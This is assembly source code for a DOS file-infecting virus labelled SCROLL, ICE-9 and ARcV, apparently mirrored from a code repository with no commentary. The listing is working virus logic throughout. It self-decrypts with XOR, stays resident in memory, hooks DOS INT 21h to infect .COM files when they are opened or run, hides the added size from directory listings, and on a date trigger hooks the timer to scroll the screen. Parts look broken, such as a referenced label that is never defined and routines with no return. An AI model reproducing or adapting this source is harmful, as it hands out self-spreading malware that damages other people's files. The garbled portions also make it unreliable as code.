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synced 2025-02-01 06:47:28 +00:00
426 lines
13 KiB
426 lines
13 KiB
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PAGE 55,132
TITLE ?????
len equ offset handle-offset main2
enlen1 equ offset int21-offset main3
code segment
org 100h
main: xor si,si
call level1
jmp main2
dd 0h
main2: call level1
jmp main3
int24 dd 0h
level1: call nextline
nextline: pop ax
xchg si,ax
sub si,offset nextline
lea di,(main3+si)
mov cx,enlen1
uncry1: xor byte ptr ds:[di],01h
key: inc di
loop uncry1
main3: lea ax,(oldstart+si)
mov di,0100h
mov cx,2
xchg si,ax
repz movsw
xchg si,ax
mov cs:[scrolrq],00h
mov ax,0f307h
int 21h
cmp ax,0cf9h
je run_old
jmp instal
run_old: mov ax,cs
mov ds,ax
mov es,ax
mov ax,0100h
jmp ax
instal: xor ax,ax ; Residency Routine
push ax
mov ax,es
dec ax
mov es,ax
pop ds
cmp byte ptr es:[0],5ah
jne run_old
mov ax,es:[3]
sub ax,0bch
jb run_old
mov es:[3],ax
sub word ptr es:[12h],0bch
mov es,es:[12h]
push ds
push cs
pop ds
mov di,offset main2
lea ax,(main2+si)
xchg si,ax
mov cx,len
repz movsb
pop ds
xchg si,ax
mov ah,2ah
int 21h
cmp cx,1993
jb instal_int21
cmp dl,3
jne instal_int21
cmp al,4h
jne instal_int21
jmp instal_scrol
instal_int21: xor ax,ax
mov ds,ax
mov ax,ds:[0084h]
mov bx,ds:[0086h]
mov word ptr es:[int21],ax
mov word ptr es:[int21+2],bx
mov ds:[0084h],offset new21
mov ds:[0086h],es
push cs
pop es
jmp run_old
; Int 1ch Handler
new1c: inc word ptr cs:[count]
cmp word ptr cs:[count],1554h
jb chain_1c
push ax
push dx
push ds
xor ax,ax
mov ds,ax
mov dx,word ptr ds:[0463h]
in al,dx
push ax
mov al,8
out dx,al
inc dx
in al,dx
mov ah,al
inc ah
and ah,0fh
and al,0f0h
or al,ah
out dx,al
pop ax
dec dx
out dx,al
pop ds
pop dx
pop ax
chain_1c: jmp cs:[int1c]
int1c dd 0h
count dw 0h
scrolrq db 0h
; Int 21h Handler
adjust_fcb: push bx
push es
push ax
mov ah,2fh
call i21
pop ax
call i21
push ax
cmp al,0ffh
je not_fcb_adjust
cmp byte ptr es:[bx],0ffh
jne normal_fcb
add bx,7
normal_fcb: mov al,byte ptr es:[bx+17h]
and al,1fh
cmp al,1fh
jne not_fcb_adjust
sub es:[bx+1dh],len
not_fcb_adjust: pop ax
pop es
pop bx
retf 2
check_fcb: cmp ah,11h
je adjust_fcb
cmp ah,12h
je adjust_fcb
jmp check_infect
new21: cmp ax,0f307h
jne check_for_handle
neg ax
retf 2
check_for_handle: cmp ah,4eh
jb check_fcb
cmp ah,4fh
ja check_infect
jmp adjust
chain_21: jmp cs:[int21]
check_infect: cmp byte ptr cs:[scrolrq],0ffh
je chain_21
cmp ah,3dh
je open_request
cmp ah,4bh
je open_request
jmp chain_21
open_request: push ax
push bx
push cx
push dx
push es
push bp
push di
push ds
mov di,dx
mov cx,6fh
next_byte: cmp ds:[di],'C.'
jne inc_pointer
cmp ds:[di+2],'MO'
jne inc_pointer
cmp byte ptr ds:[di+4],00h
jne inc_pointer
jmp infect_it
inc_pointer: inc di
loop next_byte
exit_21: pop ds
pop di
pop bp
pop es
pop dx
pop cx
pop bx
pop ax
jmp chain_21
mov bp,sp
mov dx,ss:[bp+8]
mov ax,4300h
call i21
mov cs:[file_attr],cx
and cx,01fh
cmp cx,2
jae exit_21
xor cx,cx
mov ax,4301h
call i21
open_file: mov ax,3d02h
call i21
jc exit_21
mov cs:[handle],ax
mov ax,cs
mov ds,ax
mov es,ax
mov ax,5700h
call file_int21
mov ds:[file_time],cx
mov ds:[file_date],dx
mov ah,3fh
mov dx,offset oldstart
mov cx,4h
call file_int21
mov ax,4200h
xor cx,cx
mov dx,word ptr ds:[oldstart+1]
add dx,3
call file_int21
mov ah,3fh
mov dx,offset buff
mov cx,5
call file_int21
mov di,offset buff
mov si,offset main2
mov cx,5
compare_next: repz cmpsb
je close_21
no_marker: mov ax,4202h
xor cx,cx
mov dx,cx
call file_int21
cmp ax,0fd00h-len
ja close_21
sub ax,3
mov word ptr ds:[jump+1],ax
call encry_and_save
mov ax,4200h
xor cx,cx
mov dx,cx
call file_int21
mov ah,40h
mov cx,3
mov dx,offset jump
call file_int21
mov cx,ds:[file_time]
or cl,01fh
mov dx,ds:[file_date]
mov ax,5701h
call file_int21
mov dx,ss:[bp+8]
pop ds
push ds
mov ax,4301h
mov cx,cs:[file_attr]
call i21
close_21: mov ah,3eh
call file_int21
jmp exit_21
instal_scrol: push es
mov ah,12h
mov bx,2210h
int 10h
pop es
cmp bx,2210h
jne change_int8
jmp instal_int21
adjust: push es
push bx
push ax
mov ah,2fh
call i21
pop ax
call i21
push ax
jc ret_from_inter
mov ah,byte ptr es:[bx+16h]
and ah,01fh
cmp ah,01fh
jne ret_from_inter
sub word ptr es:[bx+1ah],len
ret_from_inter: pop ax
pop bx
pop es
retf 2
file_int21: mov bx,cs:[handle]
i21: pushf
call cs:[int21]
change_int8: mov ax,351ch
push es
int 21h
pop ds
mov word ptr ds:[int1c],bx
mov word ptr ds:[int1c+2],es
mov ax,251ch
mov dx,offset new1c
int 21h
push ds
pop es
mov byte ptr ds:[scrolrq],0ffh
jmp instal_int21
; Data Area
info db '[SCROLL]',00h
db 'ICE-9'
db ' ARcV',00h
oldstart: mov ah,4ch
int 21h
jump db 0e9h,00h,00h
command db '\COMMAND.COM',00h
int21 dd 0h
encry_and_save: cli
call level1
mov ah,40h
mov cx,len
mov bx,ds:[handle]
mov dx,offset main2
call cs:[int21]
call level1
add byte ptr cs:[key-1],2
handle dw 0h
file_time dw 0h
file_date dw 0h
file_attr dw 0h
buff db 70h dup (?)
code ends
end main